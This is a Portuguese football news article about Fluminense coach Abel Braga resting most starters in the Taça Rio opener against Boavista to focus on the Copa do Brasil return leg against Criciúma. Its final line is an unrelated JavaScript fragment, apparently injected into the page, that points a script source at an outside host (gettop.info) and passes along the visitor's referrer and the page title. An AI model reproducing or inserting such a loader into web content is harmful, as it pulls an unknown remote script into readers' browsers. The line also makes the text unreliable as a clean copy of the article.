Logo após o empate em 1 x 1 com o Criciúma, em Santa Catarina, no jogo de ida pela Copa do Brasil, o técnico Abel Braga anunciou que vai poupar a maior parte de seus titulares na estreia da Taça Rio, segundo turno do Campeonato Carioca, domingo, às 19h, contra o Boavista, no Estádio Elcyr Resende, em Saquarema. A decisão do treinador, que tem o aval da diretoria, se deve ao regulamento do próprio Estadual, que deixa poucos objetivos para o Tricolor.
Como conquistou a Taça Guanabara, o Fluminense já se garantiu nas semifinais do Campeonato Carioca. Portanto, vencer o segundo turno para ele não é muito interesse, já que mesmo faturando o título o time não garantiria o título do Estadual. Paralelamente a isso, o time tem ainda o jogo de volta pela terceira fase da Copa do Brasil, na próxima quarta-feira, diante do Criciúma, no Estádio Giulitte Coutinho, em Mesquita.
“Vamos conversar com a fisiologia e avaliar a situação, mas devemos poupar de 70% a 80% do time, pois na próxima quarta-feira temos uma partida que é eliminatória e que define a nossa vida na Copa do Brasil”, disse Abel.
Quem vencer na quarta-feira em Mesquita vai se garantir nas oitavas de final da Copa do Brasil. Empate sem gols serve ao Fluminense, pois os tentos anotados como visitante valem para critério de desempate na competição. Novo 1 x 1 forçará a disputa de pênaltis e igualdade a partir de 2 x 2 serve aos catarinenses.
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;